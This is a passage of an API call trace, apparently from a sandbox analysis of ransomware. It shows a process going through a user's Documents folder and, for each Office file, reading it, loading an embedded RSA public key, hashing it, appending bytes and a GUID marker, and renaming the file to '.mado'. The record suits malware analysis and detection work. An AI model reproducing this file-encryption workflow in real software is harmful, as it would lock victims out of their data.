(lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.019] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.019] CloseHandle (hObject=0x63c) returned 1 [0204.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0204.020] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b70b68 [0204.020] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bDCJecVJFUpJJKq-L.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bdcjecvjfupjjkq-l.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\bDCJecVJFUpJJKq-L.pptx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bdcjecvjfupjjkq-l.pptx.mado")) returned 1 [0204.024] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0204.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0204.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2ef090 [0204.024] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned=".ini" [0204.024] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ef8b670, ftCreationTime.dwHighDateTime=0x1d56dfe, ftLastAccessTime.dwLowDateTime=0x5d12e910, ftLastAccessTime.dwHighDateTime=0x1d5e07a, ftLastWriteTime.dwLowDateTime=0x5d12e910, ftLastWriteTime.dwHighDateTime=0x1d5e07a, nFileSizeHigh=0x0, nFileSizeLow=0x14bc6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EqwtueAIzhhR_q7drkB.xlsx", cAlternateFileName="EQWTUE~1.XLS")) returned 1 [0204.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0204.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef090 [0204.024] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EqwtueAIzhhR_q7drkB.xlsx") returned=".xlsx" [0204.024] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EqwtueAIzhhR_q7drkB.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eqwtueaizhhr_q7drkb.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.024] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=84934) returned 1 [0204.024] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.027] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x14ba0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.027] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.028] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x14bc6, lpOverlapped=0x0) returned 1 [0204.029] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0204.029] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.029] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.029] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0204.030] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.030] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.030] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.030] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.030] GetLastError () returned 0x0 [0204.030] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.030] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0204.030] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.030] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.030] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.031] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c6a8 [0204.031] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b70b68 [0204.031] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x14bc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.031] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.032] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.032] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.032] CloseHandle (hObject=0x63c) returned 1 [0204.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeff8 [0204.033] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b70b68 [0204.033] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EqwtueAIzhhR_q7drkB.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eqwtueaizhhr_q7drkb.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EqwtueAIzhhR_q7drkB.xlsx.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eqwtueaizhhr_q7drkb.xlsx.mado")) returned 1 [0204.034] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x463890b0, ftCreationTime.dwHighDateTime=0x1d5e362, ftLastAccessTime.dwLowDateTime=0x59086520, ftLastAccessTime.dwHighDateTime=0x1d5d8aa, ftLastWriteTime.dwLowDateTime=0x59086520, ftLastWriteTime.dwHighDateTime=0x1d5d8aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fZpil8Uu6QzTlWoWB", cAlternateFileName="FZPIL8~1")) returned 1 [0204.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0204.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x3b6eb80 [0204.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff128 [0204.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32feb78 [0204.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff190 [0204.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff1f8 [0204.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b20 [0204.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff260 [0204.035] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68fd0f10, ftCreationTime.dwHighDateTime=0x1d59cbb, ftLastAccessTime.dwLowDateTime=0x44dac870, ftLastAccessTime.dwHighDateTime=0x1d59360, ftLastWriteTime.dwLowDateTime=0x44dac870, ftLastWriteTime.dwHighDateTime=0x1d59360, nFileSizeHigh=0x0, nFileSizeLow=0x1073e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kcEMhu.xlsx", cAlternateFileName="KCEMHU~1.XLS")) returned 1 [0204.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x32ff0c0 [0204.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2ef090 [0204.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ff0c0 | out: hHeap=0x2c0000) returned 1 [0204.035] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kcEMhu.xlsx") returned=".xlsx" [0204.035] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\kcEMhu.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kcemhu.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.035] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=67390) returned 1 [0204.035] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.037] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x10718, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.037] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.039] SetFilePointer (in: hFile=0x63c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0204.039] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x1073e, lpOverlapped=0x0) returned 1 [0204.040] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x32eb20 [0204.040] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.040] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.040] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x3219e0) returned 1 [0204.041] CryptCreateHash (in: hProv=0x3219e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.041] CryptHashData (hHash=0x32ef238, pbData=0x32eb20, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.041] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.041] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.041] GetLastError () returned 0x0 [0204.041] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.041] CryptReleaseContext (hProv=0x3219e0, dwFlags=0x0) returned 1 [0204.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32eb20 | out: hHeap=0x2c0000) returned 1 [0204.041] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.041] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.041] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0204.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10740) returned 0x3b80690 [0204.042] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0204.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5198 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e3a8 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdfb0 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b6e3f0 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdfc8 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fdff8 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe040 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe010 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b68078 [0204.042] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b68078, Size=0x218) returned 0x3b7c6a8 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b70b68 [0204.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdff8 | out: hHeap=0x2c0000) returned 1 [0204.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe010 | out: hHeap=0x2c0000) returned 1 [0204.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe040 | out: hHeap=0x2c0000) returned 1 [0204.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b70b68 | out: hHeap=0x2c0000) returned 1 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe040 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe010 [0204.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fdff8 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6bc98 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6bdb0 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc98 | out: hHeap=0x2c0000) returned 1 [0204.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe010 | out: hHeap=0x2c0000) returned 1 [0204.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fdff8 | out: hHeap=0x2c0000) returned 1 [0204.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe040 | out: hHeap=0x2c0000) returned 1 [0204.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0204.043] GetCurrentThreadId () returned 0x600 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3245a0 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3219e0 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.043] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.043] GetCurrentThreadId () returned 0x600 [0204.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.044] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3578 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe040 [0204.044] HeapFree (in: 